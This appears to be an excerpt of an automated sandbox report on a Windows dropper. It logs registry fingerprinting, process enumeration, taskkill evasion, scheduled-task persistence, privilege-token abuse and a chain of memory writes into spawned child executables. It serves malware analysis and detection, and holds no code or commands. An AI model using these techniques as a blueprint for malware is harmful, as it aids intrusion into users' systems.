Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1540 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
PID 1540 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
PID 1540 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
PID 396 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4132 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
PID 4132 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
PID 4932 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
PID 4932 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
PID 4932 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
PID 3544 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
PID 3544 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
PID 4620 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
PID 4620 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
PID 328 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
PID 328 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
PID 4596 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
